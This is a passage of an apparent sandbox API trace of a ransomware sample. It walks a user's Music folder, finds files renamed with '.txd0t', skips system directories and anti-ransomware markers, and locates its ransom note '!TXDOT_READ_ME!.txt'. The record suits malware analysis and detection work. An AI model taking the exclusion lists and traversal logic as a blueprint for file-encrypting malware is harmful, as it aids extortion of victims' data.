psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3.txd0t" [0119.851] PathFindExtensionW (pszPath="UMILH6.mp3.txd0t") returned=".txd0t" [0119.851] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.851] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2471fa0, ftCreationTime.dwHighDateTime=0x1d5e392, ftLastAccessTime.dwLowDateTime=0xf62b1850, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0x51e8fa97, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd0d5, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="v24aCFd5CzBX.mp3.txd0t", cAlternateFileName="V24ACF~1.TXD")) returned 1 [0119.851] StrCmpW (psz1="v24aCFd5CzBX.mp3.txd0t", psz2=".") returned 1 [0119.851] StrCmpW (psz1="v24aCFd5CzBX.mp3.txd0t", psz2="..") returned 1 [0119.851] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0119.851] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\" [0119.851] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\", psz2="v24aCFd5CzBX.mp3.txd0t", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3.txd0t" [0119.851] PathFindExtensionW (pszPath="v24aCFd5CzBX.mp3.txd0t") returned=".txd0t" [0119.851] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.851] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2471fa0, ftCreationTime.dwHighDateTime=0x1d5e392, ftLastAccessTime.dwLowDateTime=0xf62b1850, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0x51e8fa97, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd0d5, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="v24aCFd5CzBX.mp3.txd0t", cAlternateFileName="V24ACF~1.TXD")) returned 0 [0119.851] FindClose (in: hFindFile=0xec1c70 | out: hFindFile=0xec1c70) returned 1 [0119.851] GetProcessHeap () returned 0xe30000 [0119.851] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0119.851] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe99d0, ftCreationTime.dwHighDateTime=0x1d5eb78, ftLastAccessTime.dwLowDateTime=0x15050de0, ftLastAccessTime.dwHighDateTime=0x1d5e45a, ftLastWriteTime.dwLowDateTime=0x51fc0eec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x181c7, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="cSnUOnQz6xEd.wav.txd0t", cAlternateFileName="CSNUON~1.TXD")) returned 1 [0119.851] StrCmpW (psz1="cSnUOnQz6xEd.wav.txd0t", psz2=".") returned 1 [0119.851] StrCmpW (psz1="cSnUOnQz6xEd.wav.txd0t", psz2="..") returned 1 [0119.851] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0119.851] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0119.851] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="cSnUOnQz6xEd.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav.txd0t" [0119.851] PathFindExtensionW (pszPath="cSnUOnQz6xEd.wav.txd0t") returned=".txd0t" [0119.851] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.851] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b60a1a0, ftCreationTime.dwHighDateTime=0x1d5e472, ftLastAccessTime.dwLowDateTime=0x387b3280, ftLastAccessTime.dwHighDateTime=0x1d5eca3, ftLastWriteTime.dwLowDateTime=0x51edbf2e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18b82, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t", cAlternateFileName="FTX5O-~1.TXD")) returned 1 [0119.851] StrCmpW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t", psz2=".") returned 1 [0119.851] StrCmpW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t", psz2="..") returned 1 [0119.851] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0119.851] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0119.851] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3.txd0t" [0119.851] PathFindExtensionW (pszPath="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t") returned=".txd0t" [0119.852] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.852] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafa72b10, ftCreationTime.dwHighDateTime=0x1d5eb5a, ftLastAccessTime.dwLowDateTime=0x495be580, ftLastAccessTime.dwHighDateTime=0x1d5ee3e, ftLastWriteTime.dwLowDateTime=0x51fe6f8f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x122cd, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="JKFgwNnPDq3IzeypAX.wav.txd0t", cAlternateFileName="JKFGWN~1.TXD")) returned 1 [0119.852] StrCmpW (psz1="JKFgwNnPDq3IzeypAX.wav.txd0t", psz2=".") returned 1 [0119.852] StrCmpW (psz1="JKFgwNnPDq3IzeypAX.wav.txd0t", psz2="..") returned 1 [0119.852] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0119.852] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0119.852] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="JKFgwNnPDq3IzeypAX.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav.txd0t" [0119.852] PathFindExtensionW (pszPath="JKFgwNnPDq3IzeypAX.wav.txd0t") returned=".txd0t" [0119.852] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.852] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1171f0, ftCreationTime.dwHighDateTime=0x1d5edb4, ftLastAccessTime.dwLowDateTime=0xd60c0a10, ftLastAccessTime.dwHighDateTime=0x1d5f054, ftLastWriteTime.dwLowDateTime=0x52118433, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101f9, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="NXIDve2FMxUql9.wav.txd0t", cAlternateFileName="NXIDVE~1.TXD")) returned 1 [0119.852] StrCmpW (psz1="NXIDve2FMxUql9.wav.txd0t", psz2=".") returned 1 [0119.852] StrCmpW (psz1="NXIDve2FMxUql9.wav.txd0t", psz2="..") returned 1 [0119.852] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0119.852] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0119.852] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="NXIDve2FMxUql9.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav.txd0t" [0119.852] PathFindExtensionW (pszPath="NXIDve2FMxUql9.wav.txd0t") returned=".txd0t" [0119.852] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.852] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0x5255457f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5255457f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="toS-EwE0vCCwoskwD1", cAlternateFileName="TOS-EW~1")) returned 1 [0119.852] StrCmpW (psz1="toS-EwE0vCCwoskwD1", psz2=".") returned 1 [0119.852] StrCmpW (psz1="toS-EwE0vCCwoskwD1", psz2="..") returned 1 [0119.852] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0119.852] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0119.852] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="toS-EwE0vCCwoskwD1", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0119.852] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\system32\\") returned 0x0 [0119.852] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.852] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\system\\") returned 0x0 [0119.852] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.852] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.852] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\appdata\\local\\") returned 0x0 [0119.852] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.852] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.852] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\boot\\") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\perflogs\\") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\programdata\\") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\drivers\\") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\wsus\\") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="crypt_detect") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="cryptolocker") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="ransomware") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="C:\\WINDOWS") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.853] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="C:\\Program Files") returned 0x0 [0119.853] GetProcessHeap () returned 0xe30000 [0119.853] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4f8) returned 0xed90d0 [0119.853] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0119.853] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\*", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\*") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\*" [0119.853] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\*", lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0x5255457f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5255457f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1ab0 [0119.853] StrCmpW (psz1=".", psz2=".") returned 0 [0119.853] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0x5255457f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5255457f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.853] StrCmpW (psz1="..", psz2=".") returned 1 [0119.853] StrCmpW (psz1="..", psz2="..") returned 0 [0119.853] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524613ac, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x524613ac, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52500e1d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.853] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.853] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.853] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0119.853] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\" [0119.854] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\!TXDOT_READ_ME!.txt" [0119.854] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.854] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.854] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.854] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9405f720, ftCreationTime.dwHighDateTime=0x1d5ed16, ftLastAccessTime.dwLowDateTime=0xa95acb70, ftLastAccessTime.dwHighDateTime=0x1d5e882, ftLastWriteTime.dwLowDateTime=0x5213e9a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13877, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="HN-OE9UFOJ0.mp3.txd0t", cAlternateFileName="HN-OE9~1.TXD")) returned 1 [0119.854] StrCmpW (psz1="HN-OE9UFOJ0.mp3.txd0t", psz2=".") returned 1 [0119.854] StrCmpW (psz1="HN-OE9UFOJ0.mp3.txd0t", psz2="..") returned 1 [0119.854] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0119.854] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\" [0119.854] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\", psz2="HN-OE9UFOJ0.mp3.txd0t", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3.txd0t" [0119.854] PathFindExtensionW (pszPath="HN-OE9UFOJ0.mp3.txd0t") returned=".txd0t" [0119.854] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.854] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbcf510, ftCreationTime.dwHighDateTime=0x1d5f03e, ftLastAccessTime.dwLowDateTime=0x25427f90, ftLastAccessTime.dwHighDateTime=0x1d5e8b4, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6777, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="uUCd01DT4yfQz.wav.txd0t", cAlternateFileName="UUCD01~1.TXD")) returned 1 [0119.854] StrCmpW (psz1="uUCd01DT4yfQz.wav.txd0t", psz2=".") returned 1 [0119.854] StrCmpW (psz1="uUCd01DT4yfQz.wav.txd0t", psz2="..") returned 1 [0119.854] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0119.854] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\" [0119.854] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\", psz2="uUCd01DT4yfQz.wav.txd0t", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav.txd0t") 